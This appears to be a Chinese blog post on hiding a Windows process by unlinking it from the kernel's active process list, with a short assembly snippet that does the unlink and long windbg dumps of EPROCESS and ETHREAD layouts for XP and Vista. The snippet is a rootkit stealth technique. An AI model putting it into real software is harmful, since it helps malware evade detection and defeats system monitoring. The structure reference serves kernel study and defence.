修改活动进程链隐藏进程

最新推荐文章于 2023-02-02 13:20:43 发布

Puzz1e

最新推荐文章于 2023-02-02 13:20:43 发布

阅读量1.6k

点赞数

分类专栏：编程语言

编程语言专栏收录该内容

32 篇文章 2 订阅

订阅专栏

如何修改活动进程链来隐藏进程？通过PsGetCurrentProcess函数可以获取当前线程的EPROCESS，反汇编这个函数的话可以看到这个内核函数只有三行：

mov eax, fs:0x00000124;
mov eax, [eax + 0x44];
ret

Windows中有一个叫Kernel's Processor Control Block (KPRCB)，核心处理控制块的结构，总是位于0xffdff120地址，它的数据结构也不复杂，双字指向一个地址---------ETHREAD块，0xffdff124指向当前线程的ETHREAD块，再下一个就是下个线程的ETHREAD块。ETHREAD块的数据结构相对复杂，不过你只需要知道它的offset 0x44处为EPROCESS块的地址就可以了，这就是三行代码就可以得到当前线程的EPROCESS地址的原因！EPROCESS块中有个数据结构叫活动进程链，它只有两个双字，一个FlINK，一个BLINK，FLINK指向下一个EPROCESS块的FLINK地址，BLINK则指向上一个EPROCESS块的BLINK地址，要想隐藏进程的话，只需把自己脱链。

mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址
mov eax,[eax+44h] ;EPROCESS地址
mov ecx,088h ;XP中活动进程链地址,NT下为0x98,2000下为0xA0,自己看着办吧！
mov esi,dword ptr[eax+ecx] ;XP中FLINK
mov edi,dword ptr[eax+ecx+4] ;BLINK

mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK

mov dword ptr[edi],esi ;FLINK放到前一个FLINK

Windows XP SP3 EPROCESS结构分析

经windbg调试，EPROCESS结构如下：

kd> dt nt!_eprocess

+0x000 Pcb : _KPROCESS

+0x06c ProcessLock : _EX_PUSH_LOCK

+0x070 CreateTime : _LARGE_INTEGER

+0x078 ExitTime : _LARGE_INTEGER

+0x080 RundownProtect : _EX_RUNDOWN_REF

+0x084 UniqueProcessId : Ptr32 Void

+0x088 ActiveProcessLinks : _LIST_ENTRY

+0x090 QuotaUsage : [3] Uint4B

+0x09c QuotaPeak : [3] Uint4B

+0x0a8 CommitCharge : Uint4B

+0x0ac PeakVirtualSize : Uint4B

+0x0b0 VirtualSize : Uint4B

+0x0b4 SessionProcessLinks : _LIST_ENTRY

+0x0bc DebugPort : Ptr32 Void

+0x0c0 ExceptionPort : Ptr32 Void

+0x0c4 ObjectTable : Ptr32 _HANDLE_TABLE

+0x0c8 Token : _EX_FAST_REF

+0x0cc WorkingSetLock : _FAST_MUTEX

+0x0ec WorkingSetPage : Uint4B

+0x0f0 AddressCreationLock : _FAST_MUTEX

+0x110 HyperSpaceLock : Uint4B

+0x114 ForkInProgress : Ptr32 _ETHREAD

+0x118 HardwareTrigger : Uint4B

+0x11c VadRoot : Ptr32 Void

+0x120 VadHint : Ptr32 Void

+0x124 CloneRoot : Ptr32 Void

+0x128 NumberOfPrivatePages : Uint4B

+0x12c NumberOfLockedPages : Uint4B

+0x130 Win32Process : Ptr32 Void

+0x134 Job : Ptr32 _EJOB

+0x138 SectionObject : Ptr32 Void

+0x13c SectionBaseAddress : Ptr32 Void

+0x140 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK

+0x144 WorkingSetWatch : Ptr32 _PAGEFAULT_HISTORY

+0x148 Win32WindowStation : Ptr32 Void

+0x14c InheritedFromUniqueProcessId : Ptr32 Void

+0x150 LdtInformation : Ptr32 Void

+0x154 VadFreeHint : Ptr32 Void

+0x158 VdmObjects : Ptr32 Void

+0x15c DeviceMap : Ptr32 Void

+0x160 PhysicalVadList : _LIST_ENTRY

+0x168 PageDirectoryPte : _HARDWARE_PTE

+0x168 Filler : Uint8B

+0x170 Session : Ptr32 Void

+0x174 ImageFileName : [16] UChar

+0x184 JobLinks : _LIST_ENTRY

+0x18c LockedPagesList : Ptr32 Void

+0x190 ThreadListHead : _LIST_ENTRY

+0x198 SecurityPort : Ptr32 Void

+0x19c PaeTop : Ptr32 Void

+0x1a0 ActiveThreads : Uint4B

+0x1a4 GrantedAccess : Uint4B

+0x1a8 DefaultHardErrorProcessing : Uint4B

+0x1ac LastThreadExitStatus : Int4B

+0x1b0 Peb : Ptr32 _PEB

+0x1b4 PrefetchTrace : _EX_FAST_REF

+0x1b8 ReadOperationCount : _LARGE_INTEGER

+0x1c0 WriteOperationCount : _LARGE_INTEGER

+0x1c8 OtherOperationCount : _LARGE_INTEGER

+0x1d0 ReadTransferCount : _LARGE_INTEGER

+0x1d8 WriteTransferCount : _LARGE_INTEGER

+0x1e0 OtherTransferCount : _LARGE_INTEGER

+0x1e8 CommitChargeLimit : Uint4B

+0x1ec CommitChargePeak : Uint4B

+0x1f0 AweInfo : Ptr32 Void

+0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO

+0x1f8 Vm : _MMSUPPORT

+0x238 LastFaultCount : Uint4B

+0x23c ModifiedPageCount : Uint4B

+0x240 NumberOfVads : Uint4B

+0x244 JobStatus : Uint4B

+0x248 Flags : Uint4B

+0x248 CreateReported : Pos 0, 1 Bit

+0x248 NoDebugInherit : Pos 1, 1 Bit

+0x248 ProcessExiting : Pos 2, 1 Bit

+0x248 ProcessDelete : Pos 3, 1 Bit

+0x248 Wow64SplitPages : Pos 4, 1 Bit

+0x248 VmDeleted : Pos 5, 1 Bit

+0x248 OutswapEnabled : Pos 6, 1 Bit

+0x248 Outswapped : Pos 7, 1 Bit

+0x248 ForkFailed : Pos 8, 1 Bit

+0x248 HasPhysicalVad : Pos 9, 1 Bit

+0x248 AddressSpaceInitialized : Pos 10, 2 Bits

+0x248 SetTimerResolution : Pos 12, 1 Bit

+0x248 BreakOnTermination : Pos 13, 1 Bit

+0x248 SessionCreationUnderway : Pos 14, 1 Bit

+0x248 WriteWatch : Pos 15, 1 Bit

+0x248 ProcessInSession : Pos 16, 1 Bit

+0x248 OverrideAddressSpace : Pos 17, 1 Bit

+0x248 HasAddressSpace : Pos 18, 1 Bit

+0x248 LaunchPrefetched : Pos 19, 1 Bit

+0x248 InjectInpageErrors : Pos 20, 1 Bit

+0x248 VmTopDown : Pos 21, 1 Bit

+0x248 Unused3 : Pos 22, 1 Bit

+0x248 Unused4 : Pos 23, 1 Bit

+0x248 VdmAllowed : Pos 24, 1 Bit

+0x248 Unused : Pos 25, 5 Bits

+0x248 Unused1 : Pos 30, 1 Bit

+0x248 Unused2 : Pos 31, 1 Bit

+0x24c ExitStatus : Int4B

+0x250 NextPageColor : Uint2B

+0x252 SubSystemMinorVersion : UChar

+0x253 SubSystemMajorVersion : UChar

+0x252 SubSystemVersion : Uint2B

+0x254 PriorityClass : UChar

+0x255 WorkingSetAcquiredUnsafe : UChar

+0x258 Cookie : Uint4B

其再WRK中定义如下：

// Process structure.

// If you remove a field from this structure, please also

// remove the reference to it from within the kernel debugger

// (nt\private\sdktools\ntsd\ntkext.c)

typedef struct _EPROCESS {

KPROCESS Pcb;

// Lock used to protect:

// The list of threads in the process.

// Process token.

// Win32 process field.

// Process and thread affinity setting.

EX_PUSH_LOCK ProcessLock;

LARGE_INTEGER CreateTime;

LARGE_INTEGER ExitTime;

// Structure to allow lock free cross process access to the process

// handle table, process section and address space. Acquire rundown

// protection with this if you do cross process handle table, process

// section or address space references.

EX_RUNDOWN_REF RundownProtect;

HANDLE UniqueProcessId;

// Global list of all processes in the system. Processes are removed

// from this list in the object deletion routine. References to

// processes in this list must be done with ObReferenceObjectSafe

// because of this.

LIST_ENTRY ActiveProcessLinks;

// Quota Fields.

SIZE_T QuotaUsage[PsQuotaTypes];

SIZE_T QuotaPeak[PsQuotaTypes];

SIZE_T CommitCharge;

// VmCounters.

SIZE_T PeakVirtualSize;

SIZE_T VirtualSize;

LIST_ENTRY SessionProcessLinks;

PVOID DebugPort;

PVOID ExceptionPort;

PHANDLE_TABLE ObjectTable;

// Security.

EX_FAST_REF Token;

PFN_NUMBER WorkingSetPage;

KGUARDED_MUTEX AddressCreationLock;

KSPIN_LOCK HyperSpaceLock;

struct _ETHREAD *ForkInProgress;

ULONG_PTR HardwareTrigger;

PMM_AVL_TABLE PhysicalVadRoot;

PVOID CloneRoot;

PFN_NUMBER NumberOfPrivatePages;

PFN_NUMBER NumberOfLockedPages;

PVOID Win32Process;

struct _EJOB *Job;

PVOID SectionObject;

PVOID SectionBaseAddress;

PEPROCESS_QUOTA_BLOCK QuotaBlock;

PPAGEFAULT_HISTORY WorkingSetWatch;

HANDLE Win32WindowStation;

HANDLE InheritedFromUniqueProcessId;

PVOID LdtInformation;

PVOID VadFreeHint;

PVOID VdmObjects;

PVOID DeviceMap;

PVOID Spare0[3];

union {

HARDWARE_PTE PageDirectoryPte;

ULONGLONG Filler;

};

PVOID Session;

UCHAR ImageFileName[ 16 ];

LIST_ENTRY JobLinks;

PVOID LockedPagesList;

LIST_ENTRY ThreadListHead;

// Used by rdr/security for authentication.

PVOID SecurityPort;

#ifdef _WIN64

PWOW64_PROCESS Wow64Process;

#else

PVOID PaeTop;

#endif

ULONG ActiveThreads;

ACCESS_MASK GrantedAccess;

ULONG DefaultHardErrorProcessing;

NTSTATUS LastThreadExitStatus;

// Peb

PPEB Peb;

// Pointer to the prefetches trace block.

EX_FAST_REF PrefetchTrace;

LARGE_INTEGER ReadOperationCount;

LARGE_INTEGER WriteOperationCount;

LARGE_INTEGER OtherOperationCount;

LARGE_INTEGER ReadTransferCount;

LARGE_INTEGER WriteTransferCount;

LARGE_INTEGER OtherTransferCount;

SIZE_T CommitChargeLimit;

SIZE_T CommitChargePeak;

PVOID AweInfo;

// This is used for SeAuditProcessCreation.

// It contains the full path to the image file.

SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;

MMSUPPORT Vm;

#if !defined(_WIN64)

LIST_ENTRY MmProcessLinks;

#else

ULONG Spares[2];

#endif

ULONG ModifiedPageCount;

#define PS_JOB_STATUS_NOT_REALLY_ACTIVE 0x00000001UL

#define PS_JOB_STATUS_ACCOUNTING_FOLDED 0x00000002UL

#define PS_JOB_STATUS_NEW_PROCESS_REPORTED 0x00000004UL

#define PS_JOB_STATUS_EXIT_PROCESS_REPORTED 0x00000008UL

#define PS_JOB_STATUS_REPORT_COMMIT_CHANGES 0x00000010UL

#define PS_JOB_STATUS_LAST_REPORT_MEMORY 0x00000020UL

#define PS_JOB_STATUS_REPORT_PHYSICAL_PAGE_CHANGES 0x00000040UL

ULONG JobStatus;

// Process flags. Use interlocked operations with PS_SET_BITS, etc

// to modify these.

#define PS_PROCESS_FLAGS_CREATE_REPORTED 0x00000001UL // Create process debug call has occurred

#define PS_PROCESS_FLAGS_NO_DEBUG_INHERIT 0x00000002UL // Don't inherit debug port

#define PS_PROCESS_FLAGS_PROCESS_EXITING 0x00000004UL // PspExitProcess entered

#define PS_PROCESS_FLAGS_PROCESS_DELETE 0x00000008UL // Delete process has been issued

#define PS_PROCESS_FLAGS_WOW64_SPLIT_PAGES 0x00000010UL // Wow64 split pages

#define PS_PROCESS_FLAGS_VM_DELETED 0x00000020UL // VM is deleted

#define PS_PROCESS_FLAGS_OUTSWAP_ENABLED 0x00000040UL // Outswap enabled

#define PS_PROCESS_FLAGS_OUTSWAPPED 0x00000080UL // Outswapped

#define PS_PROCESS_FLAGS_FORK_FAILED 0x00000100UL // Fork status

#define PS_PROCESS_FLAGS_WOW64_4GB_VA_SPACE 0x00000200UL // Wow64 process with 4gb virtual address space

#define PS_PROCESS_FLAGS_ADDRESS_SPACE1 0x00000400UL // Addr space state1

#define PS_PROCESS_FLAGS_ADDRESS_SPACE2 0x00000800UL // Addr space state2

#define PS_PROCESS_FLAGS_SET_TIMER_RESOLUTION 0x00001000UL // SetTimerResolution has been called

#define PS_PROCESS_FLAGS_BREAK_ON_TERMINATION 0x00002000UL // Break on process termination

#define PS_PROCESS_FLAGS_CREATING_SESSION 0x00004000UL // Process is creating a session

#define PS_PROCESS_FLAGS_USING_WRITE_WATCH 0x00008000UL // Process is using the write watch APIs

#define PS_PROCESS_FLAGS_IN_SESSION 0x00010000UL // Process is in a session

#define PS_PROCESS_FLAGS_OVERRIDE_ADDRESS_SPACE 0x00020000UL // Process must use native address space (Win64 only)

#define PS_PROCESS_FLAGS_HAS_ADDRESS_SPACE 0x00040000UL // This process has an address space

#define PS_PROCESS_FLAGS_LAUNCH_PREFETCHED 0x00080000UL // Process launch was prefetched

#define PS_PROCESS_INJECT_INPAGE_ERRORS 0x00100000UL // Process should be given inpage errors - hardcoded in trap.asm too

#define PS_PROCESS_FLAGS_VM_TOP_DOWN 0x00200000UL // Process memory allocations default to top-down

#define PS_PROCESS_FLAGS_IMAGE_NOTIFY_DONE 0x00400000UL // We have sent a message for this image

#define PS_PROCESS_FLAGS_PDE_UPDATE_NEEDED 0x00800000UL // The system PDEs need updating for this process (NT32 only)

#define PS_PROCESS_FLAGS_VDM_ALLOWED 0x01000000UL // Process allowed to invoke NTVDM support

#define PS_PROCESS_FLAGS_SMAP_ALLOWED 0x02000000UL // Process allowed to invoke SMAP support

#define PS_PROCESS_FLAGS_CREATE_FAILED 0x04000000UL // Process create failed

#define PS_PROCESS_FLAGS_DEFAULT_IO_PRIORITY 0x38000000UL // The default I/O priority for created threads. (3 bits)

#define PS_PROCESS_FLAGS_PRIORITY_SHIFT 27

#define PS_PROCESS_FLAGS_EXECUTE_SPARE1 0x40000000UL //

#define PS_PROCESS_FLAGS_EXECUTE_SPARE2 0x80000000UL //

union {

ULONG Flags;

// Fields can only be set by the PS_SET_BITS and other interlocked

// macros. Reading fields is best done via the bit definitions so

// references are easy to locate.

struct {

ULONG CreateReported : 1;

ULONG NoDebugInherit : 1;

ULONG ProcessExiting : 1;

ULONG ProcessDelete : 1;

ULONG Wow64SplitPages : 1;

ULONG VmDeleted : 1;

ULONG OutswapEnabled : 1;

ULONG Outswapped : 1;

ULONG ForkFailed : 1;

ULONG Wow64VaSpace4Gb : 1;

ULONG AddressSpaceInitialized : 2;

ULONG SetTimerResolution : 1;

ULONG BreakOnTermination : 1;

ULONG SessionCreationUnderway : 1;

ULONG WriteWatch : 1;

ULONG ProcessInSession : 1;

ULONG OverrideAddressSpace : 1;

ULONG HasAddressSpace : 1;

ULONG LaunchPrefetched : 1;

ULONG InjectInpageErrors : 1;

ULONG VmTopDown : 1;

ULONG ImageNotifyDone : 1;

ULONG PdeUpdateNeeded : 1; // NT32 only

ULONG VdmAllowed : 1;

ULONG SmapAllowed : 1;

ULONG CreateFailed : 1;

ULONG DefaultIoPriority : 3;

ULONG Spare1 : 1;

ULONG Spare2 : 1;

};

NTSTATUS ExitStatus;

USHORT NextPageColor;

union {

struct {

UCHAR SubSystemMinorVersion;

UCHAR SubSystemMajorVersion;

};

USHORT SubSystemVersion;

};

UCHAR PriorityClass;

MM_AVL_TABLE VadRoot;

ULONG Cookie;

} EPROCESS, *PEPROCESS;

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

XP SP 2
_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x06c ProcessLock      : _EX_PUSH_LOCK
   +0x070 CreateTime       : _LARGE_INTEGER
   +0x078 ExitTime         : _LARGE_INTEGER
   +0x080 RundownProtect   : _EX_RUNDOWN_REF
   +0x084 UniqueProcessId  : Ptr32 Void
   +0x088 ActiveProcessLinks : _LIST_ENTRY
   +0x090 QuotaUsage       : [3] Uint4B
   +0x09c QuotaPeak        : [3] Uint4B
   +0x0a8 CommitCharge     : Uint4B
   +0x0ac PeakVirtualSize  : Uint4B
   +0x0b0 VirtualSize      : Uint4B
   +0x0b4 SessionProcessLinks : _LIST_ENTRY
   +0x0bc DebugPort        : Ptr32 Void
   +0x0c0 ExceptionPort    : Ptr32 Void
   +0x0c4 ObjectTable      : Ptr32 _HANDLE_TABLE
   +0x0c8 Token            : _EX_FAST_REF
   +0x0cc WorkingSetLock   : _FAST_MUTEX
   +0x0ec WorkingSetPage   : Uint4B
   +0x0f0 AddressCreationLock : _FAST_MUTEX
   +0x110 HyperSpaceLock   : Uint4B
   +0x114 ForkInProgress   : Ptr32 _ETHREAD
   +0x118 HardwareTrigger  : Uint4B
   +0x11c VadRoot          : Ptr32 Void
   +0x120 VadHint          : Ptr32 Void
   +0x124 CloneRoot        : Ptr32 Void
   +0x128 NumberOfPrivatePages : Uint4B
   +0x12c NumberOfLockedPages : Uint4B
   +0x130 Win32Process     : Ptr32 Void
   +0x134 Job              : Ptr32 _EJOB
   +0x138 SectionObject    : Ptr32 Void
   +0x13c SectionBaseAddress : Ptr32 Void
   +0x140 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x144 WorkingSetWatch  : Ptr32 _PAGEFAULT_HISTORY
   +0x148 Win32WindowStation : Ptr32 Void
   +0x14c InheritedFromUniqueProcessId : Ptr32 Void
   +0x150 LdtInformation   : Ptr32 Void
   +0x154 VadFreeHint      : Ptr32 Void
   +0x158 VdmObjects       : Ptr32 Void
   +0x15c DeviceMap        : Ptr32 Void
   +0x160 PhysicalVadList  : _LIST_ENTRY
   +0x168 PageDirectoryPte : _HARDWARE_PTE
   +0x168 Filler           : Uint8B
   +0x170 Session          : Ptr32 Void
   +0x174 ImageFileName    : [16] UChar
   +0x184 JobLinks         : _LIST_ENTRY
   +0x18c LockedPagesList  : Ptr32 Void
   +0x190 ThreadListHead   : _LIST_ENTRY
   +0x198 SecurityPort     : Ptr32 Void
   +0x19c PaeTop           : Ptr32 Void
   +0x1a0 ActiveThreads    : Uint4B
   +0x1a4 GrantedAccess    : Uint4B
   +0x1a8 DefaultHardErrorProcessing : Uint4B
   +0x1ac LastThreadExitStatus : Int4B
   +0x1b0 Peb              : Ptr32 _PEB
   +0x1b4 PrefetchTrace    : _EX_FAST_REF
   +0x1b8 ReadOperationCount : _LARGE_INTEGER
   +0x1c0 WriteOperationCount : _LARGE_INTEGER
   +0x1c8 OtherOperationCount : _LARGE_INTEGER
   +0x1d0 ReadTransferCount : _LARGE_INTEGER
   +0x1d8 WriteTransferCount : _LARGE_INTEGER
   +0x1e0 OtherTransferCount : _LARGE_INTEGER
   +0x1e8 CommitChargeLimit : Uint4B
   +0x1ec CommitChargePeak : Uint4B
   +0x1f0 AweInfo          : Ptr32 Void
   +0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0x1f8 Vm               : _MMSUPPORT
   +0x238 LastFaultCount   : Uint4B
   +0x23c ModifiedPageCount : Uint4B
   +0x240 NumberOfVads     : Uint4B
   +0x244 JobStatus        : Uint4B
   +0x248 Flags            : Uint4B
   +0x248 CreateReported   : Pos 0, 1 Bit
   +0x248 NoDebugInherit   : Pos 1, 1 Bit
   +0x248 ProcessExiting   : Pos 2, 1 Bit
   +0x248 ProcessDelete    : Pos 3, 1 Bit
   +0x248 Wow64SplitPages  : Pos 4, 1 Bit
   +0x248 VmDeleted        : Pos 5, 1 Bit
   +0x248 OutswapEnabled   : Pos 6, 1 Bit
   +0x248 Outswapped       : Pos 7, 1 Bit
   +0x248 ForkFailed       : Pos 8, 1 Bit
   +0x248 HasPhysicalVad   : Pos 9, 1 Bit
   +0x248 AddressSpaceInitialized : Pos 10, 2 Bits
   +0x248 SetTimerResolution : Pos 12, 1 Bit
   +0x248 BreakOnTermination : Pos 13, 1 Bit
   +0x248 SessionCreationUnderway : Pos 14, 1 Bit
   +0x248 WriteWatch       : Pos 15, 1 Bit
   +0x248 ProcessInSession : Pos 16, 1 Bit
   +0x248 OverrideAddressSpace : Pos 17, 1 Bit
   +0x248 HasAddressSpace  : Pos 18, 1 Bit
   +0x248 LaunchPrefetched : Pos 19, 1 Bit
   +0x248 InjectInpageErrors : Pos 20, 1 Bit
   +0x248 VmTopDown        : Pos 21, 1 Bit
   +0x248 Unused3          : Pos 22, 1 Bit
   +0x248 Unused4          : Pos 23, 1 Bit
   +0x248 VdmAllowed       : Pos 24, 1 Bit
   +0x248 Unused           : Pos 25, 5 Bits
   +0x248 Unused1          : Pos 30, 1 Bit
   +0x248 Unused2          : Pos 31, 1 Bit
   +0x24c ExitStatus       : Int4B
   +0x250 NextPageColor    : Uint2B
   +0x252 SubSystemMinorVersion : UChar
   +0x253 SubSystemMajorVersion : UChar
   +0x252 SubSystemVersion : Uint2B
   +0x254 PriorityClass    : UChar
   +0x255 WorkingSetAcquiredUnsafe : UChar
   +0x258 Cookie           : Uint4B
_ETHREAD
   +0x000 Tcb              : _KTHREAD
   +0x1c0 CreateTime       : _LARGE_INTEGER
   +0x1c0 NestedFaultCount : Pos 0, 2 Bits
   +0x1c0 ApcNeeded        : Pos 2, 1 Bit
   +0x1c8 ExitTime         : _LARGE_INTEGER
   +0x1c8 LpcReplyChain    : _LIST_ENTRY
   +0x1c8 KeyedWaitChain   : _LIST_ENTRY
   +0x1d0 ExitStatus       : Int4B
   +0x1d0 OfsChain         : Ptr32 Void
   +0x1d4 PostBlockList    : _LIST_ENTRY
   +0x1dc TerminationPort  : Ptr32 _TERMINATION_PORT
   +0x1dc ReaperLink       : Ptr32 _ETHREAD
   +0x1dc KeyedWaitValue   : Ptr32 Void
   +0x1e0 ActiveTimerListLock : Uint4B
   +0x1e4 ActiveTimerListHead : _LIST_ENTRY
   +0x1ec Cid              : _CLIENT_ID
   +0x1f4 LpcReplySemaphore : _KSEMAPHORE
   +0x1f4 KeyedWaitSemaphore : _KSEMAPHORE
   +0x208 LpcReplyMessage  : Ptr32 Void
   +0x208 LpcWaitingOnPort : Ptr32 Void
   +0x20c ImpersonationInfo : Ptr32 _PS_IMPERSONATION_INFORMATION
   +0x210 IrpList          : _LIST_ENTRY
   +0x218 TopLevelIrp      : Uint4B
   +0x21c DeviceToVerify   : Ptr32 _DEVICE_OBJECT
   +0x220 ThreadsProcess   : Ptr32 _EPROCESS
   +0x224 StartAddress     : Ptr32 Void
   +0x228 Win32StartAddress : Ptr32 Void
   +0x228 LpcReceivedMessageId : Uint4B
   +0x22c ThreadListEntry  : _LIST_ENTRY
   +0x234 RundownProtect   : _EX_RUNDOWN_REF
   +0x238 ThreadLock       : _EX_PUSH_LOCK
   +0x23c LpcReplyMessageId : Uint4B
   +0x240 ReadClusterSize  : Uint4B
   +0x244 GrantedAccess    : Uint4B
   +0x248 CrossThreadFlags : Uint4B
   +0x248 Terminated       : Pos 0, 1 Bit
   +0x248 DeadThread       : Pos 1, 1 Bit
   +0x248 HideFromDebugger : Pos 2, 1 Bit
   +0x248 ActiveImpersonationInfo : Pos 3, 1 Bit
   +0x248 SystemThread     : Pos 4, 1 Bit
   +0x248 HardErrorsAreDisabled : Pos 5, 1 Bit
   +0x248 BreakOnTermination : Pos 6, 1 Bit
   +0x248 SkipCreationMsg  : Pos 7, 1 Bit
   +0x248 SkipTerminationMsg : Pos 8, 1 Bit
   +0x24c SameThreadPassiveFlags : Uint4B
   +0x24c ActiveExWorker   : Pos 0, 1 Bit
   +0x24c ExWorkerCanWaitUser : Pos 1, 1 Bit
   +0x24c MemoryMaker      : Pos 2, 1 Bit
   +0x250 SameThreadApcFlags : Uint4B
   +0x250 LpcReceivedMsgIdValid : Pos 0, 1 Bit
   +0x250 LpcExitThreadCalled : Pos 1, 1 Bit
   +0x250 AddressSpaceOwner : Pos 2, 1 Bit
   +0x254 ForwardClusterOnly : UChar
   +0x255 DisablePageFaultClustering : UChar

Vista 下：
0: kd> vertarget
Windows Vista Kernel Version 6000 MP (2 procs) Free x86 compatible
Built by: 6000.16386.x86fre.vista_rtm.061101-2205
Kernel base = 0x81800000 PsLoadedModuleList = 0x81908ab0
Debug session time: Fri Aug 31 16:16:35.457 2007 (GMT-7)
System Uptime: 0 days 0:00:18.191

0: kd> dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x080 ProcessLock      : _EX_PUSH_LOCK
   +0x088 CreateTime       : _LARGE_INTEGER
   +0x090 ExitTime         : _LARGE_INTEGER
   +0x098 RundownProtect   : _EX_RUNDOWN_REF
   +0x09c UniqueProcessId  : Ptr32 Void
   +0x0a0 ActiveProcessLinks : _LIST_ENTRY
   +0x0a8 QuotaUsage       : [3] Uint4B
   +0x0b4 QuotaPeak        : [3] Uint4B
   +0x0c0 CommitCharge     : Uint4B
   +0x0c4 PeakVirtualSize  : Uint4B
   +0x0c8 VirtualSize      : Uint4B
   +0x0cc SessionProcessLinks : _LIST_ENTRY
   +0x0d4 DebugPort        : Ptr32 Void
   +0x0d8 ExceptionPortData : Ptr32 Void
   +0x0d8 ExceptionPortValue : Uint4B
   +0x0d8 ExceptionPortState : Pos 0, 3 Bits
   +0x0dc ObjectTable      : Ptr32 _HANDLE_TABLE
   +0x0e0 Token            : _EX_FAST_REF
   +0x0e4 WorkingSetPage   : Uint4B
   +0x0e8 AddressCreationLock : _EX_PUSH_LOCK
   +0x0ec RotateInProgress : Ptr32 _ETHREAD
   +0x0f0 ForkInProgress   : Ptr32 _ETHREAD
   +0x0f4 HardwareTrigger  : Uint4B
   +0x0f8 PhysicalVadRoot  : Ptr32 _MM_AVL_TABLE
   +0x0fc CloneRoot        : Ptr32 Void
   +0x100 NumberOfPrivatePages : Uint4B
   +0x104 NumberOfLockedPages : Uint4B
   +0x108 Win32Process     : Ptr32 Void
   +0x10c Job              : Ptr32 _EJOB
   +0x110 SectionObject    : Ptr32 Void
   +0x114 SectionBaseAddress : Ptr32 Void
   +0x118 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x11c WorkingSetWatch  : Ptr32 _PAGEFAULT_HISTORY
   +0x120 Win32WindowStation : Ptr32 Void
   +0x124 InheritedFromUniqueProcessId : Ptr32 Void
   +0x128 LdtInformation   : Ptr32 Void
   +0x12c VadFreeHint      : Ptr32 Void
   +0x130 VdmObjects       : Ptr32 Void
   +0x134 DeviceMap        : Ptr32 Void
   +0x138 EtwDataSource    : Ptr32 Void
   +0x13c FreeTebHint      : Ptr32 Void
   +0x140 PageDirectoryPte : _HARDWARE_PTE_X86
   +0x140 Filler           : Uint8B
   +0x148 Session          : Ptr32 Void
   +0x14c ImageFileName    : [16] UChar
   +0x15c JobLinks         : _LIST_ENTRY
   +0x164 LockedPagesList  : Ptr32 Void
   +0x168 ThreadListHead   : _LIST_ENTRY
   +0x170 SecurityPort     : Ptr32 Void
   +0x174 PaeTop           : Ptr32 Void
   +0x178 ActiveThreads    : Uint4B
   +0x17c ImagePathHash    : Uint4B
   +0x180 DefaultHardErrorProcessing : Uint4B
   +0x184 LastThreadExitStatus : Int4B
   +0x188 Peb              : Ptr32 _PEB
   +0x18c PrefetchTrace    : _EX_FAST_REF
   +0x190 ReadOperationCount : _LARGE_INTEGER
   +0x198 WriteOperationCount : _LARGE_INTEGER
   +0x1a0 OtherOperationCount : _LARGE_INTEGER
   +0x1a8 ReadTransferCount : _LARGE_INTEGER
   +0x1b0 WriteTransferCount : _LARGE_INTEGER
   +0x1b8 OtherTransferCount : _LARGE_INTEGER
   +0x1c0 CommitChargeLimit : Uint4B
   +0x1c4 CommitChargePeak : Uint4B
   +0x1c8 AweInfo          : Ptr32 Void
   +0x1cc SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
   +0x1d0 Vm               : _MMSUPPORT
   +0x218 MmProcessLinks   : _LIST_ENTRY
   +0x220 ModifiedPageCount : Uint4B
   +0x224 Flags2           : Uint4B
   +0x224 JobNotReallyActive : Pos 0, 1 Bit
   +0x224 AccountingFolded : Pos 1, 1 Bit
   +0x224 NewProcessReported : Pos 2, 1 Bit
   +0x224 ExitProcessReported : Pos 3, 1 Bit
   +0x224 ReportCommitChanges : Pos 4, 1 Bit
   +0x224 LastReportMemory : Pos 5, 1 Bit
   +0x224 ReportPhysicalPageChanges : Pos 6, 1 Bit
   +0x224 HandleTableRundown : Pos 7, 1 Bit
   +0x224 NeedsHandleRundown : Pos 8, 1 Bit
   +0x224 RefTraceEnabled  : Pos 9, 1 Bit
   +0x224 NumaAware        : Pos 10, 1 Bit
   +0x224 ProtectedProcess : Pos 11, 1 Bit
   +0x224 DefaultPagePriority : Pos 12, 3 Bits
   +0x224 PrimaryTokenFrozen : Pos 15, 1 Bit
   +0x224 ProcessVerifierTarget : Pos 16, 1 Bit
   +0x224 StackRandomizationDisabled : Pos 17, 1 Bit
   +0x228 Flags            : Uint4B
   +0x228 CreateReported   : Pos 0, 1 Bit
   +0x228 NoDebugInherit   : Pos 1, 1 Bit
   +0x228 ProcessExiting   : Pos 2, 1 Bit
   +0x228 ProcessDelete    : Pos 3, 1 Bit
   +0x228 Wow64SplitPages  : Pos 4, 1 Bit
   +0x228 VmDeleted        : Pos 5, 1 Bit
   +0x228 OutswapEnabled   : Pos 6, 1 Bit
   +0x228 Outswapped       : Pos 7, 1 Bit
   +0x228 ForkFailed       : Pos 8, 1 Bit
   +0x228 Wow64VaSpace4Gb  : Pos 9, 1 Bit
   +0x228 AddressSpaceInitialized : Pos 10, 2 Bits
   +0x228 SetTimerResolution : Pos 12, 1 Bit
   +0x228 BreakOnTermination : Pos 13, 1 Bit
   +0x228 DeprioritizeViews : Pos 14, 1 Bit
   +0x228 WriteWatch       : Pos 15, 1 Bit
   +0x228 ProcessInSession : Pos 16, 1 Bit
   +0x228 OverrideAddressSpace : Pos 17, 1 Bit
   +0x228 HasAddressSpace  : Pos 18, 1 Bit
   +0x228 LaunchPrefetched : Pos 19, 1 Bit
   +0x228 InjectInpageErrors : Pos 20, 1 Bit
   +0x228 VmTopDown        : Pos 21, 1 Bit
   +0x228 ImageNotifyDone  : Pos 22, 1 Bit
   +0x228 PdeUpdateNeeded  : Pos 23, 1 Bit
   +0x228 VdmAllowed       : Pos 24, 1 Bit
   +0x228 SmapAllowed      : Pos 25, 1 Bit
   +0x228 ProcessInserted  : Pos 26, 1 Bit
